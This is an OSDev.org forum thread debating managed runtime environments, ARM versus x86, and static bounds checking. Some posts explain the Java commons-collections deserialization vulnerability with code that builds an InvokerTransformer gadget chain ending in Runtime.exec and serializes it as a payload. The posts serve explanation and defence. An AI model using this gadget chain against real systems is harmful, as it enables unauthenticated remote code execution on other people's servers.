OSDev.org

The Place to Start for Operating System Developers

Post subject: Re: Os and implementing good gpu drivers(nvidia)
Posted: Fri Nov 13, 2015 8:06 am
Author: Roman (Member; Joined: Thu Mar 27, 2014 3:57 am; Posts: 568; Location: Moscow, Russia)

The vulnerability has recently been acknowledged, by the way. It's fixed now.
Oracle wrote:
This is a remote code execution vulnerability and is remotely exploitable without authentication, i.e., may be exploited over a network without the need for a username and password.

_________________
"If you don't fail at least 90 percent of the time, you're not aiming high enough."
- Alan Kay


Post subject: Re: Os and implementing good gpu drivers(nvidia)
Posted: Fri Nov 13, 2015 8:30 am
Author: embryo2 (Member; Joined: Wed Jun 03, 2015 5:03 am; Posts: 397)

Schol-R-LEA wrote:
What he has said time and again is not "this is wrong and always will be wrong", but rather, "where is the advantage in it?" All you need to do is go through the numbers and demonstrate that there are advantages to a managed system that cannot be achieved through an unmanaged system - something he would argue that you should have already done anyway before committing to this course of action.

I have done it. We had discussions before, and the list of advantages was introduced. But then the discussion got into the details of every item, and since Brendan's view of each was "it's useless bloat", I came to understand that he has no serious arguments.
Schol-R-LEA wrote:
you haven't agreed on your terminology

Ok, I can repeat it.

A managed environment employs a number of techniques to control the software it runs. That is, the environment manages the code. The forms of management are many, and they differ from one another. The overall result of the techniques employed is cost, speed, and quality enhancement.

The cost here means the total cost of ownership of the user's system, including hardware, software, learning, and support.

The speed here means:
- software performance, in terms of the time taken for a task to be completed
- developer performance, in terms of "time to market"

The quality here means:
- fewer bugs
- better security
- better user experience
- less effort for the user to get the job done.
Schol-R-LEA wrote:
embryo2 wrote:
I assert there's no sane comparison between ARM and Intel.

I agree, and would go so far as to say no such comparison can be made, for a number of reasons, starting with - once again - the lack of any clear idea of what a 'sane comparison' would look like.

Well, in fact you know it. Sane here means something agreed on by many people. And yes, the word "agreed" means there will be no such thing. But if you have even a tiny fraction of a desire to solve this problem, then it's absolutely possible to discuss the matter and work out some comparison: maybe not ideal, but workable. It's a matter of your desire only. It seems Brendan has no such desire.
Schol-R-LEA wrote:
embryo2 wrote:
Have you provided any proof that I am wrong?

You do understand that it is the person making a claim who holds the burden of proof, don't you? That's one of the cornerstones of both the scientific method and general engineering.

I made the claim: there's no sane comparison. Then I showed the problem with the search for an existing comparison. Then you agreed that it's really hard. Then I asked you what I should do. And your answer: it's your problem. Well, may I ask, are you kidding?
Schol-R-LEA wrote:
The problem isn't the hardware, it's the software, and the effort it would take to either port the code or develop a software emulator that would perform adequately while supporting a sufficient portion of the existing code base, or some combination of the two.

Yes, compatibility is a problem. But do you agree that ARM has a chance to win? That was the root message. And in fact you agreed, in a somewhat unclear manner (Intel is trash, and so on).
Schol-R-LEA wrote:
Microsoft has been delaying the reckoning they know is coming on this matter, and until they act, the larger PC manufacturers will keep focusing their efforts on cheap PCs regardless of the long-term fallout because that's what their competitors are doing, and the software developers will keep doing things that misuse both the hardware and the OS in non-portable ways because they need an edge over their competitors. Until one of them changes what they are doing, the other two have to keep at it, too, or risk losing everything.

Ok, you have described the problem. But why do you deny the solution? It's the managed environment.
Schol-R-LEA wrote:
embryo2 wrote:
Schol-R-LEA wrote:
To get back to the main issue here, a large part of the goal of both Java and .Net was to make it easier to dislodge the industry from Intel's grip.

It's a disputable version. My view is that there's just a common understanding of the old principle: simpler is better. So simpler development pays off a lot for Java and .Net, and Intel here is almost irrelevant.

What I said wasn't opinion; it's a matter of historical record. While they never admitted those goals officially, several developers from both MS and Sun have come forward to say that reducing hardware vendor lock-in was among the (many) design goals of both systems.

Your words were: "the goal of both Java and .Net was to make it easier to dislodge the industry from Intel's grip". As I read the translations of "dislodge" in many dictionaries, it implies very serious effort on the part of whoever pursues such a goal. I very much doubt that Microsoft had any serious plan to dislodge Intel. Microsoft was faced with Java and its market share, and that fact alone was the key component of the decision it made. And why did Java win the world? Just because (as was said): simpler is better.
Schol-R-LEA wrote:
embryo2 wrote:
Schol-R-LEA wrote:
Microsoft wanted to be ready to jump to PowerPC or Itanium

Recompilation takes much less effort than creating a totally different (managed) environment.

What.

/me stares in shock at what Embryo just wrote

You're an OS developer. You should know that, managed or otherwise, a lot more goes into porting an OS - even one designed for portability - to a new hardware platform than just recompiling. A lot more.

Ok, do you know (as an OS developer) about the effort required to port Linux to ARM or PowerPC? Has the Linux community managed to find resources for such an effort? Do you think the Linux community has spent more resources than Microsoft did on its .Net?

_________________
My previous account (embryo) was accidentally deleted, so I have no choice but to use something new. But maybe it was a good lesson about software reliability :)


Post subject: Re: Os and implementing good gpu drivers(nvidia)
Posted: Fri Nov 13, 2015 8:46 am
Author: embryo2 (Member; Joined: Wed Jun 03, 2015 5:03 am; Posts: 397)

Roman wrote:
The vulnerability has recently been acknowledged, by the way. It's fixed now.
Oracle wrote:
This is a remote code execution vulnerability and is remotely exploitable without authentication, i.e., may be exploited over a network without the need for a username and password.

I should stress a bit: i.e., may be exploited over a network without the need for a username and password. It's not about arbitrary remote command execution (like touch). It's about the way the guys from Oracle (in fact, former BEA guys) implemented the client-server communication. They just trust any deserialized object, and in doing so they allow an attacker to send malicious commands to the server. But the commands come only from the set implemented by Oracle's guys. The boys just don't bother to check the user's credentials and are ready to run their own server's commands on behalf of an attacker.

Once more: the commands are already there and are just part of the server management console. No attacker is allowed to do something like "touch /tmp/whatever".

And yes, if somebody "forgets" about authentication, then it's a security problem irrespective of the protocol involved. And yes, it's not a Java problem. Or what do you think the count of Apache HTTP Server security bugs is?

_________________
My previous account (embryo) was accidentally deleted, so I have no choice but to use something new. But maybe it was a good lesson about software reliability :)


Post subject: Re: Os and implementing good gpu drivers(nvidia)
Posted: Fri Nov 13, 2015 9:03 am
Author: Octocontrabass (Member; Joined: Mon Mar 25, 2013 7:01 pm; Posts: 5069)

embryo2 wrote:
Octocontrabass wrote:
The payload (ab)uses InvokerTransformer to specify an object that must be instantiated by calling the exec method of a Runtime object.

Can you specify the way it uses it?

One of the members of the parent object is specified as an object that can only be instantiated by following a chain of transformers. The deserializer will then follow these steps in order to instantiate the member object:
  1. Create an object of the Runtime class
  2. Create an object by calling getMethod("getRuntime", new Class[0]) on the previous object
  3. Create an object by calling invoke(null, new Object[0]) on the previous object
  4. Create a new object by calling exec("touch /tmp/pwned") on the previous object
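
In code, those four steps are just a chain of commons-collections transformers applied one after another. Here is a sketch of the gadget the proof-of-concept builds (class and constructor names from the commons-collections 3.x API; the command string is the same example as above), shown from the generation side:

Code:
    import org.apache.commons.collections.Transformer;
    import org.apache.commons.collections.functors.ChainedTransformer;
    import org.apache.commons.collections.functors.ConstantTransformer;
    import org.apache.commons.collections.functors.InvokerTransformer;

    public class GadgetSketch {
        public static Transformer buildChain() {
            // Each InvokerTransformer reflectively calls one method on the
            // object produced by the previous step in the chain.
            return new ChainedTransformer(new Transformer[] {
                new ConstantTransformer(Runtime.class),            // step 1
                new InvokerTransformer("getMethod",
                    new Class[]  { String.class, Class[].class },
                    new Object[] { "getRuntime", new Class[0] }),  // step 2
                new InvokerTransformer("invoke",
                    new Class[]  { Object.class, Object[].class },
                    new Object[] { null, new Object[0] }),         // step 3
                new InvokerTransformer("exec",
                    new Class[]  { String.class },
                    new Object[] { "touch /tmp/pwned" })           // step 4
            });
        }
    }

In the proof-of-concept the chain is attached to a LazyMap, so a map lookup performed during readObject() calls chain.transform() and ends in Runtime.exec().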

embryo2 wrote:
"magic"

Just because you do not understand does not make it magic.

embryo2 wrote:
His explanation will be - I just put the malicious class in the server's class path.

Please, ask the author. (Or indeed, ask anyone who understands Java better than I do.) I can guarantee with 100% certainty that the answer will not involve putting a malicious class in the server's class path. Instead, it will involve poor behavior of the readObject methods in commons-collections.

embryo2 wrote:
Have you noticed the enclosing object?

Which enclosing object?


Post subject: Re: Os and implementing good gpu drivers(nvidia)
Posted: Fri Nov 13, 2015 1:32 pm
Author: Schol-R-LEA (Member; Joined: Fri Oct 27, 2006 9:42 am; Posts: 1925; Location: Athens, GA, USA)

embryo2 wrote:
Schol-R-LEA wrote:
What he has said time and again is not "this is wrong and always will be wrong", but rather, "where is the advantage in it?" All you need to do is go through the numbers and demonstrate that there are advantages to a managed system that cannot be achieved through an unmanaged system - something he would argue that you should have already done anyway before committing to this course of action.

I have done it. [emphasis added] We had discussions before, and the list of advantages was introduced.


embryo2 wrote:
Schol-R-LEA wrote:
You do understand that it is the person making a claim who holds the burden of proof, don't you? That's one of the cornerstones of both the scientific method and general engineering.

I made the claim: there's no sane comparison. Then I showed the problem with the search for an existing comparison [emphasis added].

I must have missed the part where you showed, well, anything at all. I'll go back and look through the old posts, I guess. If you have links, I would appreciate it, though I should be able to find them myself with a little time and effort.

Getting back to what you said earlier in the post:

embryo2 wrote:
Schol-R-LEA wrote:
you haven't agreed on your terminology

Ok, I can repeat it.

A managed environment employs a number of techniques to control the software it runs. That is, the environment manages the code.


OK, then, now we are getting somewhere. The definition is a bit tautological and incomplete - it amounts to "A managed environment is one which manages code" without specifying what managing the code actually means - but it is more than we've had up until now. So, let's start by asking, what techniques do all 'managed environments' use?

embryo2 wrote:
The forms of management are many, and they differ from one another.


This is something of a handwave, and while I understand that the two most widely used managed environments - the JVM and .NET CLI - are quite different, you haven't explained how they are similar, and what makes them 'managed' versus, say, UCSD Pascal or FIG FORTH. What is it that makes a system 'managed', and what qualifies as a 'managed environment' that is new and unique? Would (for example) a compile-and-go Common Lisp REPL qualify as a 'managed environment'? What about Smalltalk-80 or Squeak? Or the original Dartmouth BASIC interpreter? What are the defining qualities of a managed environment, and how do they differ from earlier systems with some or all of the same properties?

Are there any characteristics that are absolutely required for a system to be considered 'managed'? A bytecode virtual machine (such as a p-machine interpreter or the Smalltalk engine)? A JIT compiler (like a Lisp or Scheme compile-and-go REPL)? Garbage collection (like more languages than I could hope to name, starting with LISP 1.5 in 1958 and including things as disparate as SNOBOL and Rust)? Runtime bounds checking (like every Pascal compiler ever written)? All of the above? None of the above? Something else? Definitions need to define, not just describe.

embryo2 wrote:
The overall result of the techniques employed is cost, speed, and quality enhancement.

The cost here means the total cost of ownership of the user's system, including hardware, software, learning, and support.

The speed here means:
- software performance, in terms of the time taken for a task to be completed
- developer performance, in terms of "time to market"

The quality here means:
- fewer bugs
- better security
- better user experience
- less effort for the user to get the job done.


And how is it supposed to accomplish these goals, and why can they be achieved in a 'managed environment' but not an 'unmanaged' one? As I've already pointed out, all the trappings of 'managed environments' that have been mentioned so far have appeared in the past, both individually and as a collection, so differentiating how a 'managed environment' differs from (for example) a UCSD Pascal p-System OS application with run-time checks running partly in an interpreter and partly as natively-compiled code isn't at all clear, nor is it clear that these properties add value that cannot be achieved in some other manner.

Unlike Brendan, I don't really have an axe to grind about this; indeed, my own planned language and runtime system will have a lot of these properties themselves. I am, however, trying to determine how to minimize the impact of them, by (for example) finding ways of performing static checks to eliminate most runtime checks, amortizing compilation time by moving most of the analysis to the AOT compile stage and bundling those results along with the AST, reducing repeated compiles through caching, and various other means of making the runtime environment less 'managed'. What I want to know is, how do you intend to address these issues in your system? Hell, if you're doing something interesting, I'd love to hear it so I can consider if I can apply it to my own work.

TL;DR - You need to figure out why you are doing what you are doing, and understand the trade-offs you are making for it, rather than spouting off lofty intentions with no idea how to achieve them.

embryo2 wrote:
Schol-R-LEA wrote:
The problem isn't the hardware, it's the software, and the effort it would take to either port the code or develop a software emulator that would perform adequately while supporting a sufficient portion of the existing code base, or some combination of the two.

Yes, compatibility is a problem. But do you agree that ARM has a chance to win? That was the root message. And in fact you agreed, in a somewhat unclear manner (Intel is trash, and so on).

ARM specifically? Hard to say. If any of the current systems are going to, it probably will be ARM, if only because, with the rise of its use in mobile systems, the chip production runs are now large enough to gain traction over the x86. However, it isn't clear whether anyone (least of all the consumers) is going to win at all, or when. I don't doubt that ARM can outperform x86, if enough development work goes into pushing its performance; the questions are a) will any of the chip manufacturers currently producing that design be able and willing to commit to doing so, b) will the majority of software vendors - including, but not limited to, Microsoft - be able and willing to commit to transitioning to it at the cost of most of their existing software base, and c) will the motherboard and peripheral vendors go along with it.

This has nothing to do with technology and everything to do with profitability and risk management. As I said, everyone is expecting it to happen eventually (if not with ARM, then with some other, newer architecture), but no one is willing to stick their neck out to do it until they have no choice, especially at a time when the desktop market is already taking a beating from mobile platforms.

If you think you can talk, say, Asus into building an ATX form factor mobo that uses an ARM processor, then convince Microsoft to re-write desktop Windows for ARM, and then convince a significant number of users to buy them even though they won't run most Windows software, then maybe something will happen. In the meanwhile, we as hobbyists can wait and work on Raspberry Pis and BeagleBoards until the rest of the industry changes.

TL;DR: I agree, but what two hobbyist OS devs happen to think means nothing in the light of commercial reality.

embryo2 wrote:
Schol-R-LEA wrote:
Microsoft has been delaying the reckoning they know is coming on this matter, and until they act, the larger PC manufacturers will keep focusing their efforts on cheap PCs regardless of the long-term fallout because that's what their competitors are doing, and the software developers will keep doing things that misuse both the hardware and the OS in non-portable ways because they need an edge over their competitors. Until one of them changes what they are doing, the other two have to keep at it, too, or risk losing everything.

Ok, you have described the problem. But why do you deny the solution? It's the managed environment.


embryo2 wrote:
Ok, do you know (as an OS developer) about the effort required to port Linux to ARM or PowerPC? Has the Linux community managed to find resources for such an effort? Do you think the Linux community has spent more resources than Microsoft did on its .Net?


Actually, I would say that the total effort needed to port Linux to these platforms has been about the same, possibly greater. The difference is that the Linux work was done over a period of years, by large numbers of independent developers working on many independent projects, with few if any hard deadlines, so it is much harder to gauge the overall work put into it.

_________________
Rev. First Speaker Schol-R-LEA;2 LCF ELF JAM POEE KoR KCO PPWMTF
Ordo OS Project
Lisp programmers tend to seem very odd to outsiders, just like anyone else who has had a religious experience they can't quite explain to others.


Post subject: Re: Os and implementing good gpu drivers(nvidia)
Posted: Fri Nov 13, 2015 2:33 pm
Author: Brendan (Member; Joined: Sat Jan 15, 2005 12:00 am; Posts: 8561; Location: At his keyboard!)

Hi,

Schol-R-LEA wrote:
I must have missed the part where you showed, well, anything at all. I'll go back and look through the old posts, I guess. If you have links, I would appreciate it, though I should be able to find them myself with a little time and effort.


This discussion actually started in a different topic back in January.

Near the start of that discussion I had trouble getting embryo2 to focus on the differences between managed and unmanaged (without getting side-tracked into things like large libraries and portability that apply to both managed and unmanaged). For this reason I defined "managed environment" as using software to perform additional checking at run-time (which isn't limited to techniques like JIT but includes an AOT compiler inserting run-time checks); and defined "managed language" as a language primarily intended to suit a managed environment (e.g. a language that prohibits things that can't be checked by a managed environment, like raw pointers and inline assembly). I've stuck to these definitions since.
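
As a concrete illustration of that definition (my sketch, not Brendan's code), the distinguishing feature is a check the environment inserts, not one the programmer writes:

Code:
    // What the programmer writes:
    a[i] = 0;

    // What a managed environment conceptually executes, whether the check
    // is inserted by a JIT or by an AOT compiler:
    if (i < 0 || i >= a.length) {
        throw new ArrayIndexOutOfBoundsException(i);
    }
    a[i] = 0;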

Schol-R-LEA wrote:
embryo2 wrote:
Yes, compatibility is a problem. But do you agree that ARM has a chance to win? That was the root message. And in fact you agreed, in a somewhat unclear manner (Intel is trash, and so on).

ARM specifically? Hard to say.


It's easier than you'd think...

The thing is; Intel is an ARM licensee, and have also sold ARM CPUs in the past (StrongARM, XScale). As soon as Intel thinks there might be any actual risk of ARM getting into the desktop/server market they'll start producing their own ARM chips as insurance. Intel haven't done this (yet), so there's no chance of ARM winning the desktop/server market (yet). ;)


Cheers,

Brendan

_________________
For all things; perfection is, and will always remain, impossible to achieve in practice. However; by striving for perfection we create things that are as perfect as practically possible. Let the pursuit of perfection be our guide.


Post subject: Re: Os and implementing good gpu drivers(nvidia)
Posted: Fri Nov 13, 2015 3:56 pm
Author: Schol-R-LEA (Member; Joined: Fri Oct 27, 2006 9:42 am; Posts: 1925; Location: Athens, GA, USA)

Brendan wrote:
The thing is; Intel is an ARM licensee, and have also sold ARM CPUs in the past (StrongARM, XScale). As soon as Intel thinks there might be any actual risk of ARM getting into the desktop/server market they'll start producing their own ARM chips as insurance. Intel haven't done this (yet), so there's no chance of ARM winning the desktop/server market (yet). ;)

This is a good point, actually, though I am not sure if Intel would embrace ARM as their bread and butter (too much of a NIH factor, since they would be licensing it, and not enough options for keeping competing fabricators from doing the same).

While Intel certainly would like to move away from x86-64 (especially since they don't really control it as much as they would like to, given that the 64-bit extensions are based on AMD's design), they would at the same time prefer to have a firm grip on any replacement that comes along (though they might be willing to license the ISA if they own it themselves), just as a matter of basic business strategy.

However, this strategy has a history of backfiring, both for them (in addition to the IA-64/Itanium family, which was aimed mainly at the server market initially, there was the earlier iAPX432, which got overshadowed by the supposedly interim 8086 architecture designed while it was being finished, and the i860 RISC CPU that was meant to become the next big thing in workstations around 1990) and for others (e.g., the IBM PS/2 line), so they are biding their time on the matter. If another company comes up with a world-beating ARM system, then yes, they would probably jump on the bandwagon if they didn't have any alternative lined up, but until then they will probably keep dithering on the issue until they are certain they've pushed x86-64 as far as they can.

_________________
Rev. First Speaker Schol-R-LEA;2 LCF ELF JAM POEE KoR KCO PPWMTF
Ordo OS Project
Lisp programmers tend to seem very odd to outsiders, just like anyone else who has had a religious experience they can't quite explain to others.


Post subject: Re: Os and implementing good gpu drivers(nvidia)
Posted: Sat Nov 14, 2015 6:35 am
Author: Schol-R-LEA (Member; Joined: Fri Oct 27, 2006 9:42 am; Posts: 1925; Location: Athens, GA, USA)

Brendan wrote:
Schol-R-LEA wrote:
I must have missed the part where you showed, well, anything at all. I'll go back and look through the old posts, I guess. If you have links, I would appreciate it, though I should be able to find them myself with a little time and effort.


This discussion actually started in a different topic back in January.


Ah, I forgot to thank you for that link. I'm going through the thread now, and already I have noted a number of things that seem problematic about several of the statements people are making (like the bizarre conflation of 'software development lifecycle' and 'program operational lifespan' on Embryo's part in this post, or your own repeated assertion that overflows and buffer overruns can always be statically checked at compile time), but I am getting some sense of the history of this debate already. I wish I were surprised to see that most of the ground covered over and over again in this thread had already been well trodden before, but duels of this sort are hardly uncommon in forum 'discussions', and the cycle is very difficult, if not impossible, to break once it has started.

WRT one specific assertion mentioned earlier - that overflows can always be statically checked - I want to present a use case and see how you would propose to handle it, as it should help clarify what we mean by the term 'runtime bounds checking'.

Let us consider a case where an application program is simply incrementing a value that needs to be within a given range - say, 0 to 999 (the bounds are arbitrary, and I deliberately chose one not on a bit boundary; also, this need not reflect the effective values - for example, the 'real' values may be -250..749, with an offset of -250). Let us assume, for practicality's sake, a conventional byte-oriented architecture (that is to say, the operational unit of memory is an eight-bit value). In this instance, the upper bound is too large to fit within a single byte, so we will need a two-byte value to hold our counter - we can assume that the two bytes are a contiguous pair in whatever byte order the hardware uses, though if there are solutions which involve separating the value into individual bytes, I'd be willing to consider them.

If we are simply incrementing the value using the increment or addition primitive, with no runtime check on the size of the value, then when the value is 999 prior to the increment, it will go to 1000, which exceeds the range of values we seek to use. In this instance, while there is no physical overflow of the value, it has exceeded the acceptable range of values. Thus, it seems to me that we will need to check the current value either prior to or immediately following the increment, regardless of how the increment is defined at a higher level of abstraction. Do you consider this to be a run-time bounds check, and if so, how would you eliminate the test?

Note that I have not given the context of this use case - neither whether it is part of a loop condition or simply some arbitrary part of the program logic, nor whether the increment or the range are explicitly defined in the program or not. Context may be relevant to your solution, I will grant, but I want to first consider the general case before moving on to specific cases.

Again, I am not specifically trying to poke holes in your claim, but rather looking to see just what it is you are actually claiming. I think that there are still a lot of undefined terms flying around, and it is high time we clarified them.

_________________
Rev. First Speaker Schol-R-LEA;2 LCF ELF JAM POEE KoR KCO PPWMTF
Ordo OS Project
Lisp programmers tend to seem very odd to outsiders, just like anyone else who has had a religious experience they can't quite explain to others.


Post subject: Re: Os and implementing good gpu drivers(nvidia)
Posted: Sat Nov 14, 2015 7:35 am
Author: Schol-R-LEA (Member; Joined: Fri Oct 27, 2006 9:42 am; Posts: 1925; Location: Athens, GA, USA)

I noted some flaws in my original use case, which I have corrected; you may want to review what I've changed.

_________________
Rev. First Speaker Schol-R-LEA;2 LCF ELF JAM POEE KoR KCO PPWMTF
Ordo OS Project
Lisp programmers tend to seem very odd to outsiders, just like anyone else who has had a religious experience they can't quite explain to others.


Post subject: Re: Os and implementing good gpu drivers(nvidia)
Posted: Sat Nov 14, 2015 7:39 am
Author: embryo2 (Member; Joined: Wed Jun 03, 2015 5:03 am; Posts: 397)

Octocontrabass wrote:
One of the members of the parent object is specified as an object that can only be instantiated by following a chain of transformers. The deserializer will then follow these steps in order to instantiate the member object:
  1. Create an object of the Runtime class
  2. Create an object by calling getMethod("getRuntime", new Class[0]) on the previous object
  3. Create an object by calling invoke(null, new Object[0]) on the previous object
  4. Create a new object by calling exec("touch /tmp/pwned") on the previous object

If we represent your algorithm in a slightly simpler and simultaneously slightly deeper form, it would be like this:

  1. Send a magical class name in the payload
  2. Expect that the JVM will be able to instantiate some classes in a class hierarchy that aren't present in the server's class path
  3. After some magic has helped the JVM do the dirty work, the deserializer runs the getObject method of the magically summoned class
  4. The getObject method performs the steps you provided above (get Runtime, get exec, run it).

But I still see some magic here. Can I expect that all Java systems can do it?

And once again, the algorithm is this:

  1. Java takes a class name
  2. Java loads the class (it's important!)
  3. Java invokes the getObject method of the loaded class

If there's no step 2, then there's no getObject, and nothing but a ClassNotFoundException.
Octocontrabass wrote:
Just because you do not understand does not make it magic.

Let me put it this way:

2+2=5.

And if you do not understand how it works, it doesn't mean there's some magic.
Octocontrabass wrote:
Please, ask the author.

I want to show here that it is not Java's fault if somebody doesn't present full information about his newfound "vulnerability". And I don't want to discuss with the author his advertising tricks and his obfuscated text. And I very much doubt the author will agree to post his apologies here. And there's just no author's e-mail in the article.

If you still want me to contact him, please give me his e-mail; I'll send him some information and a reference to this thread.
Octocontrabass wrote:
I can guarantee with 100% certainty that the answer will not involve putting a malicious class in the server's class path.

Can you put some money on it? Or is it only 99% now?
Octocontrabass wrote:
Which enclosing object?

The getObject method is enclosed in a class. Every method in Java must be enclosed in a class. There's no way of getting the method without loading the enclosing class. And that class should be in the JVM's class path.

_________________
My previous account (embryo) was accidentally deleted, so I have no choice but to use something new. But maybe it was a good lesson about software reliability :)


Post subject: Re: Os and implementing good gpu drivers(nvidia)
Posted: Sat Nov 14, 2015 7:58 am
Member (Joined: Tue Jan 21, 2014 10:16 am; Posts: 56)

Schol-R-LEA wrote:
I noted some flaws in my original use case, which I have corrected; you may want to review what I've changed.


You'll want to read this introduction to abstract interpretation for a good intro to static analysis. You'll notice that this technique will either prove the program correct (by stating that the variable is always below 1000) or say that it cannot prove this. In the latter case two possibilities exist: a) the program is indeed wrong, and b) the program is correct but the analyser failed to prove it.

Now you could create a compiler that rejects all programs that are rejected by the static analysis, and your programs will be free of buffer overflows if they compile. You have just removed all buffer overflows from your programs, but many correct programs may not compile either.

This would be practical if your analysis produces few false negatives. You can then go and either aid the analysis by providing more knowledge or add a runtime check until the program compiles.

This is more or less the opposite of the approach of always adding a runtime check and removing it if the optimizer is sure it isn't needed.
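
A toy sketch of the interval idea described above (my own illustration, not taken from the linked introduction): the analyser keeps a [lo, hi] range per variable, joins ranges where control flow merges, and rejects an increment it cannot prove in-bounds.

Code:
    public class IntervalDemo {
        static final class Interval {
            final int lo, hi;
            Interval(int lo, int hi) { this.lo = lo; this.hi = hi; }
            Interval add(int k) { return new Interval(lo + k, hi + k); }   // abstract "x + k"
            Interval join(Interval o) {                                    // merge of two branches
                return new Interval(Math.min(lo, o.lo), Math.max(hi, o.hi));
            }
            boolean within(int min, int max) { return lo >= min && hi <= max; }
        }

        public static void main(String[] args) {
            // x = 0; if (...) x = 9;  =>  x is in [0, 9] after the merge
            Interval x = new Interval(0, 0).join(new Interval(9, 9));
            Interval after = x.add(1);                                     // [1, 10]
            if (after.within(0, 999)) {
                System.out.println("accepted: x + 1 provably stays in 0..999");
            } else {
                System.out.println("rejected: possible overflow (or a false negative)");
            }
        }
    }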


Post subject: Re: Os and implementing good gpu drivers(nvidia)
Posted: Sat Nov 14, 2015 8:43 am
Author: Octocontrabass (Member; Joined: Mon Mar 25, 2013 7:01 pm; Posts: 5069)

embryo2 wrote:
Expect that the JVM will be able to instantiate some classes in a class hierarchy that aren't present in the server's class path

There is no special class hierarchy here, only objects made from commons-collections classes.

embryo2 wrote:
But I still see some magic here. Can I expect that all Java systems can do it?

The vulnerability is fundamental to the way commons-collections operates, so it should occur in any compatible Java implementation. However, I haven't tried the exploit in any non-Oracle JVMs, so I can't say for sure that it will work.

embryo2 wrote:
  1. Java takes a class name
  2. Java loads the class (it's important!)
  3. Java invokes the getObject method of the loaded class

If there's no step 2, then there's no getObject, and nothing but a ClassNotFoundException.

I see no issues with step 2. The payload requires only classes in the JRE and commons-collections.

embryo2 wrote:
Let me put it this way:

2+2=5.

And if you do not understand how it works, it doesn't mean there's some magic.

Of course, I understand mathematics. There is no magic here either.

2x + 2x = 5x

Algebra says you may divide both sides of the equation by x, resulting in the equation 2+2=5.

embryo2 wrote:
If you still want me to contact him, please give me his e-mail; I'll send him some information and a reference to this thread.

In the land of 2015, where any public-facing email address is scraped and spammed to oblivion by bots, no one with any sense makes their email address public. However, you can easily contact him through GitHub, Twitter, Reddit, and probably other sites as well.

embryo2 wrote:
Can you put some money on it? Or is it only 99% now?

Yes. How does $1000 USD sound? Please read the next section carefully before agreeing.

embryo2 wrote:
The getObject method is enclosed in a class. Every method in Java must be enclosed in a class. There's no way of getting the method without loading the enclosing class. And that class should be in the JVM's class path.

The getObject method is used by the code that generates the payload; it is not part of the payload. Do you see the return statement? The object returned there is serialized to become the payload.

The payload does not contain any references to getObject or its parent class (CommonsCollections1). You can easily verify this by examining the payload with a hex editor.
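
To make that distinction concrete, here is a minimal sketch (the CommonsCollections1 generator call mirrors the PoC's ysoserial-style API and is assumed here; the stream plumbing is standard java.io):

Code:
    import java.io.*;
    import ysoserial.payloads.CommonsCollections1;  // the PoC's generator (assumed dependency)

    public class PayloadDemo {
        public static void main(String[] args) throws Exception {
            // Attacker's machine: getObject() runs here, once, to build the object graph.
            Object gadget = new CommonsCollections1().getObject("touch /tmp/pwned");
            ByteArrayOutputStream bos = new ByteArrayOutputStream();
            new ObjectOutputStream(bos).writeObject(gadget);
            byte[] payload = bos.toByteArray();
            // The payload bytes name only the gadget classes (commons-collections
            // and JRE classes), never CommonsCollections1 itself.

            // Vulnerable server: the endpoint effectively does this single line...
            Object obj = new ObjectInputStream(new ByteArrayInputStream(payload)).readObject();
            // ...and the transformer chain fires inside readObject(), before obj is used.
        }
    }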


Post subject: Re: Os and implementing good gpu drivers(nvidia)
Posted: Sat Nov 14, 2015 8:45 am
Author: embryo2 (Member; Joined: Wed Jun 03, 2015 5:03 am; Posts: 397)

Schol-R-LEA wrote:
If you have links, I would appreciate it, though I should be able to find them myself with a little time and effort.

Thanks to Brendan; he just did it for both of us.
Schol-R-LEA wrote:
OK, then, now we are getting somewhere. The definition is a bit tautological and incomplete - it amounts to "A managed environment is one which manages code" without specifying what managing the code actually means - but it is more than we've had up until now. So, let's start by asking, what techniques do all 'managed environments' use?

Ok, let's go into details. The most important things are:

  1. Portable bytecode instead of machine-specific code
  2. Language with some restrictions that help make code analysis easier
  3. Language that is easy to learn
  4. Rich set of libraries as a "must have" part of the language
  5. Language with performance-related hints and other additional runtime information (annotations)
  6. Ahead-of-time compilation
  7. Just-in-time compilation
  8. Automatic memory management
  9. Automatic (at least partial) resource management
  10. Very deep introspection capabilities at runtime (from within the program itself and from an external tool like a debugger)
  11. Control over the application life cycle (deployment, compilation, runtime, uninstall)
  12. Very smart compiler
  13. Ability to decide at compile time whether it is required to insert safety checks
  14. Ability to compile an application without safety checks and run it under hardware protection
Schol-R-LEA wrote:
Would (for example) a compile-and-go Common Lisp REPL qualify as a 'managed environment'? What about Smalltalk-80 or Squeak? Or the original Dartmouth BASIC interpreter? What are the defining qualities of a managed environment, and how do they differ from earlier systems with some or all of the same properties?

I hope the list above covers most of the "defining" qualities. But I may still remember something else :) Well, honestly, I haven't systematized the subject to an academic level.
Schol-R-LEA wrote:
Are there any characteristics that are absolutely required for a system to be considered 'managed'? A bytecode virtual machine (such as a p-machine interpreter or the Smalltalk engine)? A JIT compiler (like a Lisp or Scheme compile-and-go REPL)? Garbage collection (like more languages than I could hope to name, starting with LISP 1.5 in 1958 and including things as disparate as SNOBOL and Rust)? Runtime bounds checking (like every Pascal compiler ever written)? All of the above?

All of the above. The problem here is solved by involving a lot of tools; one tool is never enough.
Schol-R-LEA wrote:
And how is it supposed to accomplish these goals, and why can they be achieved in a 'managed environment' but not an 'unmanaged' one?

Let's look at time to market. If a language is easy to learn, then it penetrates deeper into the developer community. If the language prevents some classes of bugs by design, then applications will be less buggy. If an application's runtime information is easily accessible, then the application is easy to debug, and as a result it has fewer bugs. If a developer isn't burdened with common tasks like memory management, then his productivity rises. If there's a rich library easily accessible to every developer, then developers can reuse a lot of code and don't need to reinvent the wheel, which makes them even more productive. If the environment allows a program to run under many operating systems, then the developer's productivity again rises a lot, because there's no need for recompilation or for hunting OS- or hardware-specific problems.

Well, the list is really very long. It would be much easier to split it into parts. And even better just to answer your questions :) But I'm not trying to escape the need for clarification.
Schol-R-LEA wrote:
so differentiating how a 'managed environment' differs from (for example) a UCSD Pascal p-System OS application with run-time checks running partly in an interpreter and partly as natively-compiled code isn't at all clear

The difference is simple: the number of things matters. It's about the environment as a whole, not about one technique or another.
Schol-R-LEA wrote:
I am, however, trying to determine how to minimize the impact of them, by (for example) finding ways of performing static checks to eliminate most runtime checks, amortizing compilation time by moving most of the analysis to the AOT compile stage and bundling those results along with the AST, reducing repeated compiles through caching, and various other means of making the runtime environment less 'managed'.

Runtime information and runtime behavior are the things we need to look at. It's impossible to do everything before runtime.
Schol-R-LEA wrote:
What I want to know is, how do you intend to address these issues in your system?

My prototype is here, and its description provides some details about future development directions. But, of course, it's not a finished and polished thing.
Schol-R-LEA wrote:
ARM specifically? Hard to say.

ARM has the biggest mobile market share, so it has some starting advantage. But of course, nobody knows the future.

_________________
